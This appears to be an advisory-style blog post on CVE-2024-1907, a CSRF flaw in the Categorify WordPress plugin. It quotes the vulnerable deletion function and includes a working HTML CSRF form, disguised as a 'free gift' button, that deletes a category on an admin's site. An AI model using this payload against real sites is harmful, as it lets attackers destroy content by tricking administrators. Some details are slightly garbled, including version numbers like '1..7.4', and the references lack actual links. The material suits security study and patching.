The Categorify plugin for WordPress is a popular, easy-to-use tool that helps users manage and organize their site's content into categories. However, it has recently been discovered that all versions of the plugin up to and including 1..7.4 are vulnerable to Cross-Site Request Forgery (CSRF). This vulnerability, identified as CVE-2024-1907, stems from missing or incorrect nonce validation on the Categorify plugin's categorifyAjaxDeleteCategory function. In this post, we'll provide a detailed analysis of the vulnerability, including code snippets, links to the original references, and exploit scenarios.

Vulnerability Details

CSRF is a type of web application vulnerability that allows an attacker to trick a victim into performing actions on a site that the victim has permission to access. In the case of CVE-2024-1907, the Categorify plugin fails to properly validate a nonce, which is a unique token used to help prevent CSRF attacks. This enables an unauthenticated attacker to potentially delete categories on a WordPress site by sending a forged request, provided they can trick a site administrator into performing an action like clicking on a malicious link.

The issue lies in the categorifyAjaxDeleteCategory function in the Categorify plugin's categorify.php file. Here's a snippet of the vulnerable code:

function categorifyAjaxDeleteCategory()
{
    // missing or incorrect nonce validation
    $category_id = sanitize_text_field($_POST["category_id"]);
    wp_delete_category($category_id);
}

As we can see, there's no proper nonce validation being done before deleting the category using the wp_delete_category function. This leaves the plugin open to CSRF attacks.

Exploit Scenarios

For an attacker to exploit this vulnerability, they would first need to create a malicious webpage containing a CSRF payload – a crafted request designed to target the vulnerable WordPress site. Then, they would need to trick the site administrator into visiting the malicious page, perhaps through a phishing email or social engineering attack. Once the targeted administrator clicks on a link or button containing the CSRF payload, the malicious request is sent – without the knowledge of the victim – and the exploit is performed.

Below is a simple example of an HTML file containing a CSRF payload that can exploit CVE-2024-1907

<html>
  <body>
    <form action="http://target-site.com/wp-admin/admin-ajax.php?action=categorifyAjaxDeleteCategory"; method="POST" enctype="multipart/form-data">
      <input type="hidden" name="category_id" value="4" />
      <input type="submit" value="Click here to claim your free gift!" />
    </form>
  </body>
</html>

Mitigations

To protect your WordPress site against CVE-2024-1907 and prevent CSRF attacks, it is essential to keep the Categorify plugin up-to-date. The plugin's developers have fixed this vulnerability in version 1..7.5 by implementing proper nonce validation in the categorifyAjaxDeleteCategory function. If you are using an older version of the plugin, immediately upgrade to the latest version to ensure your site remains secure.

Additionally, security-conscious site administrators should always be cautious when clicking on links and opening untrusted webpages, as this is the primary method through which CSRF attacks are carried out.

Conclusion

CVE-2024-1907 highlights the importance of proper nonce validation when developing WordPress plugins, as well as the ongoing need for vigilance on the part of site administrators. By keeping plugins up-to-date and practicing good online safety habits, WordPress site owners can significantly reduce their risk of falling victim to CSRF attacks.

For more information about CVE-2024-1907, please visit the following original references

1. WordPress Plugin Vulnerability Database entry for Categorify
2. Categorify plugin's GitHub repository with the fixed version

Timeline

Published on: 02/27/2024 11:15:09 UTC
Last modified on: 02/27/2024 14:19:41 UTC